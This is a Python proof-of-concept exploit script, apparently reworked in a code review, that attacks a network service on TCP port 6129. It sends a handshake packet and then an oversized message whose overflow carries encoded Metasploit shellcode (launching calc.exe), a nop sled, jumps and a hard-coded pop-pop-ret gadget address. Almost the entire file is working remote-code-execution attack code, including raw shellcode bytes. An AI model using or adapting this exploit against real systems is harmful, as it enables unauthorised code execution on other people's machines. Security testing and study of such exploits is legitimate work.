- import socket
- import sys
- import os
- import time
- import struct
- import binascii
- import random
- # windows/exec - 220 bytes
- # http://www.metasploit.com
- # Encoder: x86/shikata_ga_nai
- # VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
- # CMD=calc.exe
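# ---------------------------------------------------------------------------
# Proof-of-concept exploit for the service listening on TCP/6129.  It sends a
# version-negotiation packet, then one oversized 0x9c44 message whose overflow
# region carries the calc.exe shellcode plus a short-jump / pop-pop-ret pair.
# Only run this against hosts you are authorised to test.
#
# Review notes on this revision:
#   * every "\x.." escape had lost its backslash in the pasted copy, so the
#     strings were literal ASCII "xba..." rather than shellcode; restored.
#   * all struct formats are explicitly little-endian ("<") so the wire bytes
#     do not depend on the host interpreter's native endianness/alignment.
#   * send() -> sendall(): send() may return after a partial write.
#   * the socket is always closed (try/finally); `type` no longer shadows the
#     builtin; exit() -> sys.exit(); the stray argc debug print was dropped.
#   * the script body moved into functions behind a __main__ guard, so the
#     builders can be unit-tested without opening a connection.
# ---------------------------------------------------------------------------

# Metasploit windows/exec (CMD=calc.exe), x86/shikata_ga_nai encoded, 220 bytes.
# Kept as a bytes literal so it is the same type under Python 2 and 3.
sc = (
    b"\xba\x01\xa8\x4f\x9e\xd9\xca\xd9\x74\x24\xf4\x5e\x29"
    b"\xc9\xb1\x31\x31\x56\x13\x03\x56\x13\x83\xee\xfd\x4a"
    b"\xba\x62\x15\x08\x45\x9b\xe5\x6d\xcf\x7e\xd4\xad\xab"
    b"\x0b\x46\x1e\xbf\x5e\x6a\xd5\xed\x4a\xf9\x9b\x39\x7c"
    b"\x4a\x11\x1c\xb3\x4b\x0a\x5c\xd2\xcf\x51\xb1\x34\xee"
    b"\x99\xc4\x35\x37\xc7\x25\x67\xe0\x83\x98\x98\x85\xde"
    b"\x20\x12\xd5\xcf\x20\xc7\xad\xee\x01\x56\xa6\xa8\x81"
    b"\x58\x6b\xc1\x8b\x42\x68\xec\x42\xf8\x5a\x9a\x54\x28"
    b"\x93\x63\xfa\x15\x1c\x96\x02\x51\x9a\x49\x71\xab\xd9"
    b"\xf4\x82\x68\xa0\x22\x06\x6b\x02\xa0\xb0\x57\xb3\x65"
    b"\x26\x13\xbf\xc2\x2c\x7b\xa3\xd5\xe1\xf7\xdf\x5e\x04"
    b"\xd8\x56\x24\x23\xfc\x33\xfe\x4a\xa5\x99\x51\x72\xb5"
    b"\x42\x0d\xd6\xbd\x6e\x5a\x6b\x9c\xe4\x9d\xf9\x9a\x4a"
    b"\x9d\x01\xa5\xfa\xf6\x30\x2e\x95\x81\xcc\xe5\xd2\x7e"
    b"\x87\xa4\x72\x17\x4e\x3d\xc7\x7a\x71\xeb\x0b\x83\xf2"
    b"\x1e\xf3\x70\xea\x6a\xf6\x3d\xac\x87\x8a\x2e\x59\xa8"
    b"\x39\x4e\x48\xcb\xdc\xdc\x10\x22\x7b\x65\xb2\x3a"
)

port = 6129

# Address of the "pop pop ret" gadget written over the handler slot.  It is a
# hard-coded, non-relocatable address: it is only valid for the exact target
# build this exploit was written against, as are the 0x2ac / 0xbc offsets in
# build_payload().  There is no version check before firing it.
GADGET_ADDR = 0x00401161

MSG_TYPE = 0x9c44        # message type that reaches the vulnerable handler
HANDSHAKE_LEN = 40       # fixed size of the initial version packet
SLED_LEN = 0x10          # nop sled in front of the shellcode
HIJACK_OFFSET = 0x2ac    # distance from sled start to the short jump / gadget


def build_handshake(major=4400, minor=444.0):
    """Return the 40-byte version-negotiation packet sent right after connect.

    Layout: ``<I major``, four 0xcc bytes, ``<d minor`` twice, then "C"
    padding up to HANDSHAKE_LEN.  The minor version is sent twice because the
    original exploit did so; whether the second copy matters is not known.

    Args:
        major: value packed as the "Init Version" field.
        minor: value packed as the "Minor Version" field.

    Returns:
        bytes of length HANDSHAKE_LEN.
    """
    buf = struct.pack("<I", major)       # Init Version
    buf += b"\xcc" * 4
    buf += struct.pack("<d", minor)      # Minor Version
    buf += struct.pack("<d", minor)      # Minor Version (sent twice)
    buf += b"C" * (HANDSHAKE_LEN - len(buf))
    return buf


def build_payload(shellcode=sc, gadget=GADGET_ADDR):
    """Return the 0x9c44 message whose body overflows the target buffer.

    Args:
        shellcode: position-independent x86 code to run; it must fit in the
            ``HIJACK_OFFSET - SLED_LEN`` bytes between the sled and the jump
            / gadget pair so that those land at the expected offset.
        gadget: 32-bit address packed little-endian after the short jump
            ("pop pop return gadget" in the original).

    Returns:
        bytes: ``<I MSG_TYPE`` + overflow body + 0x200 null bytes.

    Raises:
        ValueError: if ``shellcode`` is too long.  The original code computed
            a negative pad, which Python silently turns into an empty string,
            shifting every later field without any warning.
    """
    pad = HIJACK_OFFSET - SLED_LEN - len(shellcode)
    if pad < 0:
        raise ValueError(
            "shellcode too long: %d bytes, max %d"
            % (len(shellcode), HIJACK_OFFSET - SLED_LEN)
        )

    wstr = b"\x90" * SLED_LEN            # nop sled
    wstr += shellcode                    # calc shellcode
    wstr += b"\x90" * pad                # nops up to the hijack offset
    wstr += b"\xeb\x06\xff\xff"          # short jump forward (over the gadget dword)
    wstr += struct.pack("<I", gadget)    # pop pop return gadget
    wstr += b"\x90" * 3                  # nop
    wstr += b"\xe9\x6b\xfa\xff\xff"      # jump back to shellcode (displacement is target-specific)
    wstr += b"E" * 0xbc
    wstr += b"%\x00c\x00" * 5            # five wide-char "%c"; same bytes as ("%"+"\x00"+"c"+"\x00")*5

    buf = struct.pack("<I", MSG_TYPE)    # msg type
    buf += wstr                          # payload
    buf += b"\x00" * 0x200               # null bytes
    return buf


def main(argv=None, timeout=None):
    """Connect to ``argv[1]``:6129, send the handshake and the exploit message,
    then print the two replies (hex-encoded) that the original exploit read
    before closing ("necessary reads").

    Args:
        argv: argument vector; defaults to ``sys.argv``.  Exactly one
            positional argument (the target host) is required.
        timeout: socket timeout in seconds; ``None`` keeps the original
            fully-blocking behaviour, so a silent target hangs the script.

    Exits with status 1 on bad usage.
    """
    if argv is None:
        argv = sys.argv
    if len(argv) != 2:
        print("Usage: {0} host".format(argv[0]))
        sys.exit(1)
    host = argv[1]

    csock = socket.create_connection((host, port), timeout)
    try:
        # sendall() loops until the whole buffer is written; plain send() may
        # return early and silently truncate the message.
        csock.sendall(build_handshake())
        csock.sendall(build_payload())
        # necessary reads: drain two replies before closing, as the original did
        print(binascii.hexlify(csock.recv(0x4000)).decode("ascii"))
        print(binascii.hexlify(csock.recv(0x4000)).decode("ascii"))
    finally:
        csock.close()


if __name__ == "__main__":
    main()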